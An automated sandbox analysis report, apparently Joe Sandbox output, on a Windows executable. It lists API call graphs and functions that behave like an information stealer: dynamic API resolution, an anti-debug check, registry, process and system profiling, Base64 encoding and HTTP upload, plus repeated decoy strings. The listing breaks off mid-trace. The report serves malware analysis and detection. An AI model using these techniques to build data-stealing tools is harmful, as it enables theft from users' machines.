15099->15101 15114->15081 15436 5da7a0 lstrcpy 15435->15436 15437 5c1683 15436->15437 15438 5da7a0 lstrcpy 15437->15438 15439 5c1695 15438->15439 15440 5da7a0 lstrcpy 15439->15440 15441 5c16a7 15440->15441 15442 5da7a0 lstrcpy 15441->15442 15443 5c15a3 15442->15443 15443->14317 15445 5c47c6 15444->15445 15446 5c4838 lstrlen 15445->15446 15470 5daad0 15446->15470 15448 5c4848 InternetCrackUrlA 15449 5c4867 15448->15449 15449->14394 15451 5da740 lstrcpy 15450->15451 15452 5d8b74 15451->15452 15453 5da740 lstrcpy 15452->15453 15454 5d8b82 GetSystemTime 15453->15454 15456 5d8b99 15454->15456 15455 5da7a0 lstrcpy 15457 5d8bfc 15455->15457 15456->15455 15457->14409 15459 5da931 15458->15459 15460 5da988 15459->15460 15463 5da968 lstrcpy lstrcat 15459->15463 15461 5da7a0 lstrcpy 15460->15461 15462 5da994 15461->15462 15462->14412 15463->15460 15464->14527 15466 5c9af9 LocalAlloc 15465->15466 15467 5c4eee 15465->15467 15466->15467 15468 5c9b14 CryptStringToBinaryA 15466->15468 15467->14415 15467->14418 15468->15467 15469 5c9b39 LocalFree 15468->15469 15469->15467 15470->15448 15471->14537 15472->14678 15473->14680 15474->14688 15603 5d77a0 15475->15603 15478 5d1c1e 15478->14770 15479 5d76c6 RegOpenKeyExA 15480 5d7704 RegCloseKey 15479->15480 15481 5d76e7 RegQueryValueExA 15479->15481 15480->15478 15481->15480 15483 5d1c99 15482->15483 15483->14784 15485 5d1e09 15484->15485 15485->14826 15487 5d7a9a wsprintfA 15486->15487 15488 5d1e84 15486->15488 15487->15488 15488->14840 15490 5d7b4d 15489->15490 15491 5d1efe 15489->15491 15610 5d8d20 LocalAlloc CharToOemW 15490->15610 15491->14854 15494 5da740 lstrcpy 15493->15494 15495 5d7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15494->15495 15502 5d7c25 15495->15502 15496 5d7d18 15498 5d7d1e LocalFree 15496->15498 15499 5d7d28 15496->15499 15497 5d7c46 GetLocaleInfoA 15497->15502 15498->15499 15501 5da7a0 lstrcpy 15499->15501 15500 5da9b0 lstrcpy lstrlen lstrcpy lstrcat 15500->15502 15504 5d7d37 15501->15504 15502->15496 15502->15497 15502->15500 15503 5da8a0 lstrcpy 15502->15503 15503->15502 15504->14867 15506 5d2008 15505->15506 15506->14882 15508 5d94b5 15507->15508 15509 5d9493 GetModuleFileNameExA CloseHandle 15507->15509 15510 5da740 lstrcpy 15508->15510 15509->15508 15511 5d2091 15510->15511 15511->14897 15513 5d7e68 RegQueryValueExA 15512->15513 15514 5d2119 15512->15514 15515 5d7e8e RegCloseKey 15513->15515 15514->14911 15515->15514 15517 5d7fb9 GetLogicalProcessorInformationEx 15516->15517 15518 5d7fd8 GetLastError 15517->15518 15523 5d8029 15517->15523 15519 5d8022 15518->15519 15528 5d7fe3 15518->15528 15522 5d2194 15519->15522 15525 5d89f0 2 API calls 15519->15525 15522->14925 15524 5d89f0 2 API calls 15523->15524 15526 5d807b 15524->15526 15525->15522 15526->15519 15527 5d8084 wsprintfA 15526->15527 15527->15522 15528->15517 15528->15522 15611 5d89f0 15528->15611 15614 5d8a10 GetProcessHeap RtlAllocateHeap 15528->15614 15530 5d220f 15529->15530 15530->14939 15532 5d89b0 15531->15532 15533 5d814d GlobalMemoryStatusEx 15532->15533 15534 5d8163 __aulldiv 15533->15534 15535 5d819b wsprintfA 15534->15535 15536 5d2289 15535->15536 15536->14953 15538 5d87fb GetProcessHeap RtlAllocateHeap wsprintfA 15537->15538 15540 5da740 lstrcpy 15538->15540 15541 5d230b 15540->15541 15541->14967 15543 5da740 lstrcpy 15542->15543 15544 5d8229 15543->15544 15545 5d8263 15544->15545 15547 5da9b0 lstrcpy lstrlen lstrcpy lstrcat 15544->15547 15549 5da8a0 lstrcpy 15544->15549 15546 5da7a0 lstrcpy 15545->15546 15548 5d82dc 15546->15548 15547->15544 15548->14984 15549->15544 15551 5da740 lstrcpy 15550->15551 15552 5d835c RegOpenKeyExA 15551->15552 15553 5d83ae 15552->15553 15554 5d83d0 15552->15554 15555 5da7a0 lstrcpy 15553->15555 15556 5d83f8 RegEnumKeyExA 15554->15556 15557 5d8613 RegCloseKey 15554->15557 15567 5d83bd 15555->15567 15559 5d843f wsprintfA RegOpenKeyExA 15556->15559 15560 5d860e 15556->15560 15558 5da7a0 lstrcpy 15557->15558 15558->15567 15561 5d8485 RegCloseKey RegCloseKey 15559->15561 15562 5d84c1 RegQueryValueExA 15559->15562 15560->15557 15565 5da7a0 lstrcpy 15561->15565 15563 5d84fa lstrlen 15562->15563 15564 5d8601 RegCloseKey 15562->15564 15563->15564 15566 5d8510 15563->15566 15564->15560 15565->15567 15568 5da9b0 4 API calls 15566->15568 15567->15010 15569 5d8527 15568->15569 15570 5da8a0 lstrcpy 15569->15570 15571 5d8533 15570->15571 15572 5da9b0 4 API calls 15571->15572 15573 5d8557 15572->15573 15574 5da8a0 lstrcpy 15573->15574 15575 5d8563 15574->15575 15576 5d856e RegQueryValueExA 15575->15576 15576->15564 15577 5d85a3 15576->15577 15578 5da9b0 4 API calls 15577->15578 15579 5d85ba 15578->15579 15580 5da8a0 lstrcpy 15579->15580 15581 5d85c6 15580->15581 15582 5da9b0 4 API calls 15581->15582 15583 5d85ea 15582->15583 15584 5da8a0 lstrcpy 15583->15584 15585 5d85f6 15584->15585 15585->15564 15587 5da740 lstrcpy 15586->15587 15588 5d86bc CreateToolhelp32Snapshot Process32First 15587->15588 15589 5d875d CloseHandle 15588->15589 15590 5d86e8 Process32Next 15588->15590 15591 5da7a0 lstrcpy 15589->15591 15590->15589 15595 5d86fd 15590->15595 15592 5d8776 15591->15592 15592->15042 15593 5da9b0 lstrcpy lstrlen lstrcpy lstrcat 15593->15595 15594 5da8a0 lstrcpy 15594->15595 15595->15590 15595->15593 15595->15594 15597 5da7a0 lstrcpy 15596->15597 15598 5d51b5 15597->15598 15599 5c1590 lstrcpy 15598->15599 15600 5d51c6 15599->15600 15615 5c5100 15600->15615 15602 5d51cf 15602->15054 15606 5d7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15603->15606 15605 5d76b9 15605->15478 15605->15479 15607 5d7765 RegQueryValueExA 15606->15607 15608 5d7780 RegCloseKey 15606->15608 15607->15608 15609 5d7793 15608->15609 15609->15605 15610->15491 15612 5d8a0c 15611->15612 15613 5d89f9 GetProcessHeap HeapFree 15611->15613 15612->15528 15613->15612 15614->15528 15616 5da7a0 lstrcpy 15615->15616 15617 5c5119 15616->15617 15618 5c47b0 2 API calls 15617->15618 15619 5c5125 15618->15619 15775 5d8ea0 15619->15775 15621 5c5184 15622 5c5192 lstrlen 15621->15622 15623 5c51a5 15622->15623 15624 5d8ea0 4 API calls 15623->15624 15625 5c51b6 15624->15625 15626 5da740 lstrcpy 15625->15626 15627 5c51c9 15626->15627 15628 5da740 lstrcpy 15627->15628 15629 5c51d6 15628->15629 15630 5da740 lstrcpy 15629->15630 15631 5c51e3 15630->15631 15632 5da740 lstrcpy 15631->15632 15633 5c51f0 15632->15633 15634 5da740 lstrcpy 15633->15634 15635 5c51fd InternetOpenA StrCmpCA 15634->15635 15636 5c522f 15635->15636 15637 5c58c4 InternetCloseHandle 15636->15637 15638 5d8b60 3 API calls 15636->15638 15644 5c58d9 ctype 15637->15644 15639 5c524e 15638->15639 15640 5da920 3 API calls 15639->15640 15641 5c5261 15640->15641 15642 5da8a0 lstrcpy 15641->15642 15643 5c526a 15642->15643 15645 5da9b0 4 API calls 15643->15645 15647 5da7a0 lstrcpy 15644->15647 15646 5c52ab 15645->15646 15648 5da920 3 API calls 15646->15648 15656 5c5913 15647->15656 15649 5c52b2 15648->15649 15650 5da9b0 4 API calls 15649->15650 15651 5c52b9 15650->15651 15652 5da8a0 lstrcpy 15651->15652 15653 5c52c2 15652->15653 15654 5da9b0 4 API calls 15653->15654 15655 5c5303 15654->15655 15657 5da920 3 API calls 15655->15657 15656->15602 15658 5c530a 15657->15658 15659 5da8a0 lstrcpy 15658->15659 15660 5c5313 15659->15660 15661 5c5329 InternetConnectA 15660->15661 15661->15637 15662 5c5359 HttpOpenRequestA 15661->15662 15664 5c58b7 InternetCloseHandle 15662->15664 15665 5c53b7 15662->15665 15664->15637 15666 5da9b0 4 API calls 15665->15666 15667 5c53cb 15666->15667 15668 5da8a0 lstrcpy 15667->15668 15669 5c53d4 15668->15669 15670 5da920 3 API calls 15669->15670 15671 5c53f2 15670->15671 15672 5da8a0 lstrcpy 15671->15672 15673 5c53fb 15672->15673 15674 5da9b0 4 API calls 15673->15674 15675 5c541a 15674->15675 15676 5da8a0 lstrcpy 15675->15676 15677 5c5423 15676->15677 15678 5da9b0 4 API calls 15677->15678 15679 5c5444 15678->15679 15680 5da8a0 lstrcpy 15679->15680 15681 5c544d 15680->15681 15682 5da9b0 4 API calls 15681->15682 15683 5c546e 15682->15683 15684 5da8a0 lstrcpy 15683->15684 15776 5d8ead CryptBinaryToStringA 15775->15776 15777 5d8ea9 15775->15777 15776->15777 15778 5d8ece GetProcessHeap RtlAllocateHeap 15776->15778 15777->15621 15778->15777 15779 5d8ef4 ctype 15778->15779 15780 5d8f05 CryptBinaryToStringA 15779->15780 15780->15777 15784->15057 16027 5c9880 15785->16027 15787 5c98e1 15787->15064 15789 5da740 lstrcpy 15788->15789 15962 5da740 lstrcpy 15961->15962 15963 5d0266 15962->15963 15964 5d8de0 2 API calls 15963->15964 15965 5d027b 15964->15965 15966 5da920 3 API calls 15965->15966 15967 5d028b 15966->15967 15968 5da8a0 lstrcpy 15967->15968 15969 5d0294 15968->15969 15970 5da9b0 4 API calls 15969->15970 15971 5d02b8 15970->15971 16028 5c988e 16027->16028 16031 5c6fb0 16028->16031 16030 5c98ad ctype 16030->15787 16034 5c6d40 16031->16034 16035 5c6d63 16034->16035 16049 5c6d59 16034->16049 16050 5c6530 16035->16050 16039 5c6dbe 16039->16049 16060 5c69b0 16039->16060 16041 5c6e2a 16042 5c6ee6 VirtualFree 16041->16042 16044 5c6ef7 16041->16044 16041->16049 16042->16044 16043 5c6f41 16047 5d89f0 2 API calls 16043->16047 16043->16049 16044->16043 16045 5c6f38 16044->16045 16046 5c6f26 FreeLibrary 16044->16046 16048 5d89f0 2 API calls 16045->16048 16046->16044 16047->16049 16048->16043 16049->16030 16051 5c6542 16050->16051 16053 5c6549 16051->16053 16070 5d8a10 GetProcessHeap RtlAllocateHeap 16051->16070 16053->16049 16054 5c6660 16053->16054 16059 5c668f VirtualAlloc 16054->16059 16056 5c673c 16056->16039 16057 5c6730 16057->16056 16058 5c6743 VirtualAlloc 16057->16058 16058->16056 16059->16056 16059->16057 16061 5c69c9 16060->16061 16065 5c69d5 16060->16065 16062 5c6a09 LoadLibraryA 16061->16062 16061->16065 16063 5c6a32 16062->16063 16062->16065 16067 5c6ae0 16063->16067 16071 5d8a10 GetProcessHeap RtlAllocateHeap 16063->16071 16065->16041 16066 5c6ba8 GetProcAddress 16066->16065 16066->16067 16067->16065 16067->16066 16068 5d89f0 2 API calls 16068->16067 16069 5c6a8b 16069->16065 16069->16068 16070->16053 16071->16069

                        Executed Functions

                        Function 005D9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 660 5d9860-5d9874 call 5d9750 663 5d987a-5d9a8e call 5d9780 GetProcAddress * 21 660->663 664 5d9a93-5d9af2 LoadLibraryA * 5 660->664 663->664 665 5d9b0d-5d9b14 664->665 666 5d9af4-5d9b08 GetProcAddress 664->666 668 5d9b46-5d9b4d 665->668 669 5d9b16-5d9b41 GetProcAddress * 2 665->669 666->665 671 5d9b4f-5d9b63 GetProcAddress 668->671 672 5d9b68-5d9b6f 668->672 669->668 671->672 673 5d9b89-5d9b90 672->673 674 5d9b71-5d9b84 GetProcAddress 672->674 675 5d9bc1-5d9bc2 673->675 676 5d9b92-5d9bbc GetProcAddress * 2 673->676 674->673 676->675
                        APIs
                        • GetProcAddress.KERNEL32(76210000,014A1608), ref: 005D98A1
                        • GetProcAddress.KERNEL32(76210000,014A1680), ref: 005D98BA
                        • GetProcAddress.KERNEL32(76210000,014A15A8), ref: 005D98D2
                        • GetProcAddress.KERNEL32(76210000,014A1560), ref: 005D98EA
                        • GetProcAddress.KERNEL32(76210000,014A15C0), ref: 005D9903
                        • GetProcAddress.KERNEL32(76210000,014A8B38), ref: 005D991B
                        • GetProcAddress.KERNEL32(76210000,01495088), ref: 005D9933
                        • GetProcAddress.KERNEL32(76210000,01494F48), ref: 005D994C
                        • GetProcAddress.KERNEL32(76210000,014A1728), ref: 005D9964
                        • GetProcAddress.KERNEL32(76210000,014A1590), ref: 005D997C
                        • GetProcAddress.KERNEL32(76210000,014A1698), ref: 005D9995
                        • GetProcAddress.KERNEL32(76210000,014A1740), ref: 005D99AD
                        • GetProcAddress.KERNEL32(76210000,01495148), ref: 005D99C5
                        • GetProcAddress.KERNEL32(76210000,014A16B0), ref: 005D99DE
                        • GetProcAddress.KERNEL32(76210000,014A1578), ref: 005D99F6
                        • GetProcAddress.KERNEL32(76210000,01494FA8), ref: 005D9A0E
                        • GetProcAddress.KERNEL32(76210000,014A16F8), ref: 005D9A27
                        • GetProcAddress.KERNEL32(76210000,014A16C8), ref: 005D9A3F
                        • GetProcAddress.KERNEL32(76210000,01495188), ref: 005D9A57
                        • GetProcAddress.KERNEL32(76210000,014A17D0), ref: 005D9A70
                        • GetProcAddress.KERNEL32(76210000,014951A8), ref: 005D9A88
                        • LoadLibraryA.KERNEL32(014A16E0,?,005D6A00), ref: 005D9A9A
                        • LoadLibraryA.KERNEL32(014A14E8,?,005D6A00), ref: 005D9AAB
                        • LoadLibraryA.KERNEL32(014A1710,?,005D6A00), ref: 005D9ABD
                        • LoadLibraryA.KERNEL32(014A1758,?,005D6A00), ref: 005D9ACF
                        • LoadLibraryA.KERNEL32(014A1770,?,005D6A00), ref: 005D9AE0
                        • GetProcAddress.KERNEL32(75B30000,014A1788), ref: 005D9B02
                        • GetProcAddress.KERNEL32(751E0000,014A1518), ref: 005D9B23
                        • GetProcAddress.KERNEL32(751E0000,014A1530), ref: 005D9B3B
                        • GetProcAddress.KERNEL32(76910000,014A9070), ref: 005D9B5D
                        • GetProcAddress.KERNEL32(75670000,014951C8), ref: 005D9B7E
                        • GetProcAddress.KERNEL32(77310000,014A8AE8), ref: 005D9B9F
                        • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 005D9BB6
                        Strings
                        • NtQueryInformationProcess, xrefs: 005D9BAA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: 0abe843c564d737f342c3fb83748743e5bdd05ce3ddaa2c909eef563a2628f78
                        • Instruction ID: ddbf7f6870fe11d13df2d45c05f24bc7c51e492f02038a192a7ef9fe38431be4
                        • Opcode Fuzzy Hash: 0abe843c564d737f342c3fb83748743e5bdd05ce3ddaa2c909eef563a2628f78
                        • Instruction Fuzzy Hash: 49A11BB6510344AFD3DCEFA8ED88A663BF9F78D301714C52AA645C3264D739A841CB52
                        Function 005C45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 764 5c45c0-5c4695 RtlAllocateHeap 781 5c46a0-5c46a6 764->781 782 5c46ac-5c474a 781->782 783 5c474f-5c47a9 VirtualProtect 781->783 782->781
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005C460F
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 005C479C
                        Strings
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C45D2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C462D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C46B7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C45E8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C477B
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C475A
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4713
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C45F3
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C471E
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4770
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C46CD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4657
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C45DD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C466D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4734
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C46AC
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4729
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4643
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C46C2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C474F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C45C7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4678
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4765
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4617
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4638
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4683
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4622
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C473F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C4662
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005C46D8
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                        • API String ID: 1542196881-2218711628
                        • Opcode ID: 7d6b5bb0886f354b54714608d7c215c6841851ead91230df25d8a7967726e58d
                        • Instruction ID: 738ffae114688c72d5f40b359bbd85fef143b17161f54d0c6a77a65a72dee528
                        • Opcode Fuzzy Hash: 7d6b5bb0886f354b54714608d7c215c6841851ead91230df25d8a7967726e58d
                        • Instruction Fuzzy Hash: FF4116607D168C6AC72EFBE7884EEFD7B7A7F42704F50504AA85853280DBF079094522
                        Function 005C4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 801 5c4880-5c4942 call 5da7a0 call 5c47b0 call 5da740 * 5 InternetOpenA StrCmpCA 816 5c494b-5c494f 801->816 817 5c4944 801->817 818 5c4ecb-5c4ef3 InternetCloseHandle call 5daad0 call 5c9ac0 816->818 819 5c4955-5c4acd call 5d8b60 call 5da920 call 5da8a0 call 5da800 * 2 call 5da9b0 call 5da8a0 call 5da800 call 5da9b0 call 5da8a0 call 5da800 call 5da920 call 5da8a0 call 5da800 call 5da9b0 call 5da8a0 call 5da800 call 5da9b0 call 5da8a0 call 5da800 call 5da9b0 call 5da920 call 5da8a0 call 5da800 * 2 InternetConnectA 816->819 817->816 829 5c4ef5-5c4f2d call 5da820 call 5da9b0 call 5da8a0 call 5da800 818->829 830 5c4f32-5c4fa2 call 5d8990 * 2 call 5da7a0 call 5da800 * 8 818->830 819->818 905 5c4ad3-5c4ad7 819->905 829->830 906 5c4ad9-5c4ae3 905->906 907 5c4ae5 905->907 908 5c4aef-5c4b22 HttpOpenRequestA 906->908 907->908 909 5c4ebe-5c4ec5 InternetCloseHandle 908->909 910 5c4b28-5c4e28 call 5da9b0 call 5da8a0 call 5da800 call 5da920 call 5da8a0 call 5da800 call 5da9b0 call 5da8a0 call 5da800 call 5da9b0 call 5da8a0 call 5da800 call 5da9b0 call 5da8a0 call 5da800 call 5da9b0 call 5da8a0 call 5da800 call 5da920 call 5da8a0 call 5da800 call 5da9b0 call 5da8a0 call 5da800 call 5da9b0 call 5da8a0 call 5da800 call 5da920 call 5da8a0 call 5da800 call 5da9b0 call 5da8a0 